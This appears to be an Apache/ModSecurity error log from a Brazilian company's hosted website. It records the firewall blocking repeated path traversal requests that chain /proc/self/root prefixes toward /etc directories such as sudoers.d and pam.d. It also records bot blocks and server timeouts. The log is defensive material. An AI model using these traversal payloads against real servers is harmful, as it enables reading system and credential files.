[Tue Mar 17 17:15:16.123426 2026] [:error] [pid 7004:tid 140411607643904] [client 74.7.241.31:54670] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm2VMU6Sx0TG1YjmQjCIgAAApA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 17:15:31.141892 2026] [proxy_fcgi:error] [pid 6296:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:54074] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:15:52.049871 2026] [proxy_fcgi:error] [pid 2473:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:55054] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:16:14.125817 2026] [proxy_fcgi:error] [pid 7004:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:55564] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:16:36.121782 2026] [proxy_fcgi:error] [pid 29151:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:55952] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:16:58.037808 2026] [proxy_fcgi:error] [pid 31803:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:56390] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:17:20.131059 2026] [proxy_fcgi:error] [pid 31803:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:56710] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:17:21.207110 2026] [:error] [pid 2598:tid 140411699963648] [client 74.7.243.128:33934] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm20Rj0p0SRWAqcjGGNegAAAwU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/run/initramfs/state/etc
[Tue Mar 17 17:17:24.927012 2026] [:error] [pid 29151:tid 140411582465792] [client 74.7.241.31:49758] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm21PPqhzTj3BvfDX-bVwAAAdM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 17:17:29.249970 2026] [:error] [pid 2598:tid 140411658000128] [client 74.7.241.31:46682] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm22Rj0p0SRWAqcjGGNgAAAAwo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 17:17:42.131296 2026] [proxy_fcgi:error] [pid 19507:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:57008] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:17:46.779655 2026] [:error] [pid 2473:tid 140411733534464] [client 74.7.241.31:60152] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm26qBJNF7axNlVR0UsjQAAAAE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:18:04.137778 2026] [proxy_fcgi:error] [pid 6296:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:57344] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:18:26.126515 2026] [proxy_fcgi:error] [pid 19507:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:57632] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:18:37.198639 2026] [:error] [pid 7437:tid 140411683178240] [client 74.7.243.128:37138] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm3HQeiSKl8TjouI-YrmAAAA8c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:18:48.128013 2026] [proxy_fcgi:error] [pid 31803:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:58122] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:19:10.129803 2026] [proxy_fcgi:error] [pid 29151:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:58574] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:19:14.763530 2026] [:error] [pid 2598:tid 140411716749056] [client 74.7.243.128:59856] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm3Qhj0p0SRWAqcjGGNpQAAAwM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 17:19:32.098050 2026] [proxy_fcgi:error] [pid 29151:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:58908] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:19:35.487014 2026] [:error] [pid 29151:tid 140411632822016] [client 74.7.244.43:56924] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abm3V_PqhzTj3BvfDX-bhgAAAc0"]
[Tue Mar 17 17:19:55.149800 2026] [proxy_fcgi:error] [pid 19507:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:59218] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:19:57.889218 2026] [:error] [pid 2473:tid 140411641214720] [client 74.7.228.61:34198] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abm3baBJNF7axNlVR0UsqQAAAAw"]
[Tue Mar 17 17:20:00.798595 2026] [:error] [pid 31803:tid 140411691570944] [client 74.7.243.128:52056] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm3cOyqAr6etmhZHNo68QAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 17:20:03.129140 2026] [:error] [pid 29151:tid 140411641214720] [client 74.7.243.128:40706] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm3c_PqhzTj3BvfDX-bjAAAAcw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 17:20:06.186257 2026] [:error] [pid 6296:tid 140411599251200] [client 74.7.243.128:40716] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm3dnIk7brgkOH-rIWgZgAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 17:20:17.033824 2026] [proxy_fcgi:error] [pid 25836:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:59580] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:20:39.117820 2026] [proxy_fcgi:error] [pid 19507:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:59876] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:20:48.491403 2026] [:error] [pid 7437:tid 140411632822016] [client 74.7.241.31:34764] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm3oAeiSKl8TjouI-Yr2wAAA80"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 17:21:15.139313 2026] [proxy_fcgi:error] [pid 6296:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:60310] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:21:43.137801 2026] [proxy_fcgi:error] [pid 2473:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:60662] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:21:45.370340 2026] [core:alert] [pid 6296:tid 140411540502272] [client 74.7.243.128:40718] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/usr/include
[Tue Mar 17 17:22:06.137905 2026] [proxy_fcgi:error] [pid 29151:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:32814] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:22:28.089810 2026] [proxy_fcgi:error] [pid 6296:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:33220] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:22:51.125790 2026] [proxy_fcgi:error] [pid 2473:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:33480] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:23:13.127099 2026] [proxy_fcgi:error] [pid 7437:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:33748] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:23:15.391852 2026] [:error] [pid 25836:tid 140411649607424] [client 74.7.241.31:50158] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm4M4h-PF_25v4hFRB-tgAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 17:23:18.695226 2026] [:error] [pid 7004:tid 140411540502272] [client 74.7.241.31:59508] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm4NsU6Sx0TG1YjmQjCdAAAApg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 17:23:20.285102 2026] [:error] [pid 25836:tid 140411658000128] [client 74.7.241.31:59512] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm4OIh-PF_25v4hFRB-vAAAAQo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 17:23:21.267491 2026] [access_compat:error] [pid 2473:tid 140411733534464] [client 216.73.216.191:60808] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/goods.php
[Tue Mar 17 17:23:21.563170 2026] [:error] [pid 7437:tid 140411674785536] [client 74.7.241.31:59528] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm4OQeiSKl8TjouI-YsAwAAA8g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 17:23:33.958111 2026] [:error] [pid 25836:tid 140411741927168] [client 74.7.243.128:57676] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abm4RYh-PF_25v4hFRB-ygAAAQA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 17:23:35.118013 2026] [proxy_fcgi:error] [pid 19507:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:34024] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:23:56.131458 2026] [proxy_fcgi:error] [pid 29151:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:34252] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:24:18.125893 2026] [proxy_fcgi:error] [pid 7004:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:34524] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:24:34.854570 2026] [:error] [pid 7437:tid 140411741927168] [client 74.7.244.43:39054] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abm4ggeiSKl8TjouI-YsCwAAA8A"]
[Tue Mar 17 17:24:41.455369 2026] [proxy_fcgi:error] [pid 26799:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:34746] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 17:24:57.864522 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.228.61:59968] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abm4mda6ubjKNq_cu4YcOgAAA1Y"]
[Tue Mar 17 17:25:04.141815 2026] [proxy_fcgi:error] [pid 6296:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:35046] AH01075: Error dispatching request to : (polling)
